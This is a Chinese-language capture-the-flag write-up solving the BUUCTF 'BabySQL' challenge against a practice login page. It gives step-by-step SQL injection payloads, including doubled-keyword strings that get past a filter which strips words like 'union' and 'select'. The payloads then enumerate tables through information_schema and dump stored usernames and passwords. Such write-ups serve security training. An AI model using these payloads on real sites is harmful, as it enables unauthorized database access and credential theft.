BUUCTF [极客大挑战 2019] BabySQL
BUUCTF [极客大挑战 2019] BabySQL
启动靶机,打开环境:
![BUUCTF [极客大挑战 2019] BabySQL_第1张图片](http://img.e-com-net.com/image/info8/de2ae57b11fb4b309d26c0be2373e707.jpg)
尝试登陆:
因为前两次的题目BUUCTF 极客大挑战 2019 EasySQL和 极客大挑战 2019 LoveSQL均用万能密码登陆成功,再次尝试:
/check.php
?username=admin' or '1'='1
&password=1
![BUUCTF [极客大挑战 2019] BabySQL_第2张图片](http://img.e-com-net.com/image/info8/8b9a3c1bb9684b4b822e1644523a2248.jpg)
登陆失败,尝试注释掉password内容:
/check.php
?username=admin' %23
&password=1
![BUUCTF [极客大挑战 2019] BabySQL_第3张图片](http://img.e-com-net.com/image/info8/401962eebbeb42069adc505444f09daa.jpg)
登陆成功,尝试查询字段数:
/check.php
?username=admin' order by 3%23
&password=1
![BUUCTF [极客大挑战 2019] BabySQL_第4张图片](http://img.e-com-net.com/image/info8/6699b2fddcd74a29988b940d26abb4cf.jpg)
根据报错信息,可以判断出屏蔽掉了关键字:or,所以万能密码登陆失败,尝试双写绕过:
/check.php
?username=admin' oorr '1'='1%23
&password=1
![BUUCTF [极客大挑战 2019] BabySQL_第5张图片](http://img.e-com-net.com/image/info8/881bc61b061146b48ac5490c98c02698.jpg)
因为存在将关键字置换为空的过滤,全部双写以绕过,查询字段数:
/check.php
?username=admin' uniunionon selselectect 1,2,3,4 %23
&password=1
![BUUCTF [极客大挑战 2019] BabySQL_第6张图片](http://img.e-com-net.com/image/info8/18ad3ec9af6149238564cb17567f2587.jpg)
判断出字段数为3,查询回显点位:
/check.php
?username=1' uniunionon selselectect 11,22,33 %23
&password=1
![BUUCTF [极客大挑战 2019] BabySQL_第7张图片](http://img.e-com-net.com/image/info8/1f96e6aec5a3401e94df670b86303d94.jpg)
得到回显点位为2和3,查询当前数据库名及版本:
/check.php
?username=1' uniunionon selselectect 11,version(),database() %23
&password=1
![BUUCTF [极客大挑战 2019] BabySQL_第8张图片](http://img.e-com-net.com/image/info8/624737cbcc34432a9c13614beaeff124.jpg)
得到数据库名为:geek,继续查询当数据库中表名:
/check.php
?username=1' uniunionon selselectect 11,22,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database() %23
&password=1
![BUUCTF [极客大挑战 2019] BabySQL_第9张图片](http://img.e-com-net.com/image/info8/167708cd61d74a48b2f33b140f166958.jpg)
得到两个表名为:b4bsql和geekuser,查询第一个表中的内容:
/check.php
?username=1' uniunionon selselectect 11,22,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql' %23
&password=1
![BUUCTF [极客大挑战 2019] BabySQL_第10张图片](http://img.e-com-net.com/image/info8/b33ec999c81c45dbb643e7ca9fa82433.jpg)
得到该表中的字段信息,查询username和password的内容:
/check.php
?username=1' uniunionon selselectect 11,22,group_concat(concat_ws(0x7e,username,passwoorrd)) frfromom geek.b4bsql %23
&password=1
// 将1和2通过~(十六进制形式)连接
// 类似:username~password
group_concat(concat_ws(0x7e,1,2))
![BUUCTF [极客大挑战 2019] BabySQL_第11张图片](http://img.e-com-net.com/image/info8/ac976269cdf049babd164bf0de69c25d.jpg)
得到flag,完成题目